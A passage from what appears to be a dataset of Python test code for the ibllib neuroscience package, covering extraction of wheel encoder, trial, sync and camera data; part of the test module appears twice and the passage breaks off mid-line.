self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in 
self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n\n def tearDown(self):\n for f in self.main_path.rglob('_ibl_log.*.log'):\n f.unlink()\n [x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()\n ]\n [x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()\n ]\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert 
np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n        t0_, t1_ = sync_trials_robust(t0[1:], t1)\n        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n        t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n        t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n        t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.main_path = Path(__file__).parent\n\n    def test_encoder_events_corrupt(self):\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_lt5(file_events)\n            self.assertTrue(dy.size > 6)\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n            dy = raw._load_encoder_events_file_ge5(file_events)\n            self.assertTrue(dy.size > 6)\n\n    def test_encoder_positions_corrupts(self):\n        path = self.main_path.joinpath('data', 'wheel', 'ge5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_ge5(file_position)\n            self.assertTrue(dy.size > 18)\n        path = self.main_path.joinpath('data', 'wheel', 'lt5')\n        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n            dy = raw._load_encoder_positions_file_lt5(file_position)\n            self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n    save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n        40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = 
np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\nif __name__ == '__main__':\n unittest.main(exit=False, verbosity=2)\n", "<import token>\n\n\ndef wheelMoves_fixture(func):\n \"\"\"Decorator to save some dummy wheelMoves ALF files for extraction tests\"\"\"\n\n @functools.wraps(func)\n def wrapper(obj=None):\n attr_list = ['training_lt5', 'training_ge5', 'biased_lt5', 'biased_ge5'\n ]\n alf_paths = [(getattr(obj, p)['path'] / 'alf') for p in attr_list]\n n_trials = [getattr(obj, p)['ntrials'] for p in attr_list]\n for p, n in zip(alf_paths, n_trials):\n p.mkdir()\n np.save(str(p / '_ibl_wheelMoves.intervals.npy'), np.zeros((n, 2)))\n np.save(str(p / '_ibl_wheelMoves.peakAmplitude.npy'), np.zeros(n))\n func(obj)\n for p in alf_paths:\n shutil.rmtree(p)\n return wrapper\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 
'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = 
training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = 
biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n def test_get_intervals(self):\n di = training_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = training_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n 
self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = 
next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with 